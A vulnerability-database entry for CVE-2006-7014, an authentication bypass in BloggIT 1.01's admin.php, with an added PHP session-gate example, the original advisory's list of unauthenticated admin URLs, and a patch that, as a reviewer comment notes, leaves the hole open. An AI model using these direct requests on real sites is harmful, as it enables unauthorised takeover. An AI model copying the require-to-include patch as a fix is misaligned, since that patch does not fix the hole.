BloggIT 'admin.php' Privilege Escalation Vulnerability

Vulnerability ID 1191700 Vulnerability Type Unknown
Published 2007-02-14 Updated 2007-02-14
CVE ID CVE-2006-7014 CNNVD ID CNNVD-200702-274
Platform N/A CVSS Score 7.5
|Sources
https://www.securityfocus.com/bid/87038
https://cxsecurity.com/issue/WLB-2007020058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-274
|Details
admin.php in BloggIT 1.01 and earlier does not properly establish a user session, which allows remote attackers to gain privileges via a direct request. The session check in admin.php is commented out, so every administrative action reachable through admin.php?op=... (adding entries and users, managing entries, users, categories, comments and files) can be invoked without logging in.
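The gate that the description above says is missing, written out as an added example; this is not BloggIT's own code. It is a session.inc.php-style include that starts the session, checks the $_SESSION['login'] flag used by the commented-out line in the advisory below, and exits after redirecting to index.php (the login page named in the advisory). The function names is_admin_session, require_admin_login, mark_logged_in and self_check are assumptions made for the example.

```php
<?php
// Added example, not BloggIT's own code. A session gate for admin pages:
// it assumes the login handler sets $_SESSION['login'] = "ok", as the
// advisory's commented-out check does. Function names are hypothetical.

declare(strict_types=1);

// Pure check, separated from the superglobal so it can be tested offline.
function is_admin_session(array $session): bool
{
    return isset($session['login']) && $session['login'] === "ok";
}

// Call this before any output (before the <title> print in admin.php).
// It must exit: header("Location: ...") alone does not stop the script,
// so the admin page body would still be sent to a client that ignores
// the redirect.
function require_admin_login(string $login_page = "index.php"): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (!is_admin_session($_SESSION)) {
        header("Location: " . $login_page, true, 303);
        exit;
    }
}

// Called by the login handler once the credentials have been verified.
function mark_logged_in(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    session_regenerate_id(true); // fresh id: a pre-login id cannot be fixated
    $_SESSION['login'] = "ok";
}

// Offline self-check of the pure part; run with: php session_gate.php
function self_check(): bool
{
    return is_admin_session([]) === false
        && is_admin_session(['login' => 'ok']) === true
        && is_admin_session(['login' => 'OK']) === false
        && is_admin_session(['login' => true]) === false;
}

if (PHP_SAPI === 'cli') {
    echo self_check() ? "session gate checks passed\n" : "session gate checks FAILED\n";
}
```

In admin.php the include of this file would be followed by require_admin_login() before the first print(). Whether the file is pulled in with require() or include() only decides if a missing file is fatal or a warning; it has no effect on whether the login check runs.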
|Exploit
*/ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]>
*/ BloggIT <= 1.01 (admin.php) Arbitrary code execution
*/ 04/06/2006 5:48

Bug:

BloggIT has this in admin.php:

require("session.inc.php");
//- session_start();
//- if ($_SESSION['login'] != "ok") header("Location: index.php");

and the require() function doesn't include the file
that tests the session security.

Proof of concept:

The cracker has arbitrary access to:

http://example/admin.php
http://example/admin.php?op=add_ent
http://example/admin.php?op=add_usr
http://example/admin.php?op=man_ent
http://example/admin.php?op=man_usr
http://example/admin.php?op=man_cat
http://example/admin.php?op=man_com
http://example/admin.php?op=man_fil

Patch:

--- admin.php   2006-06-05 20:51:05.000000000 +0200
+++ admin.php  2006-06-05 20:51:23.000000000 +0200
@@ -6,7 +6,7 @@
 require("config.inc.php");
 require("language.inc.php");
 require("parsing.inc.php");
-require("session.inc.php");
+include("session.inc.php");

print("<title>{$title} - Powered by BloggIT 1.01</title>\n");
 ?>
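Review bot: replacing require("session.inc.php") with include("session.inc.php") in this hunk adds no authentication check; it only changes what happens when the file is missing (include() emits a warning and continues where require() is fatal), so a direct, unauthenticated request to admin.php still reaches the page body and every op= action. The fix needs the session check itself to run before any output and to stop the script: restore session_start(); and the if ($_SESSION['login'] != "ok") header("Location: index.php"); check shown commented out above, in admin.php or inside session.inc.php, and add exit; right after the header() call, because a Location header alone does not prevent the rest of admin.php from being rendered to a client that ignores the redirect.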
|Affected Products
Bloggit Bloggit 1.01
|References

Source: XF
Name: bloggit-admin-code-execution(27011)
Link: http://xforce.iss.net/xforce/xfdb/27011
Source: SECTRACK
Name: 1016246
Link: http://www.securitytracker.com/id?1016246
Source: BUGTRAQ
Name: 20060606 BloggIT <= 1.01 (admin.php) Arbitrary code execution
Link: http://www.securityfocus.com/archive/1/archive/1/436259/30/4620/threaded
Source: VUPEN
Name: ADV-2006-2210
Link: http://www.frsirt.com/english/advisories/2006/2210
Source: SECUNIA
Name: 20499
Link: http://secunia.com/advisories/20499
Source: SREASON
Name: 2255
Link: http://securityreason.com/securityalert/2255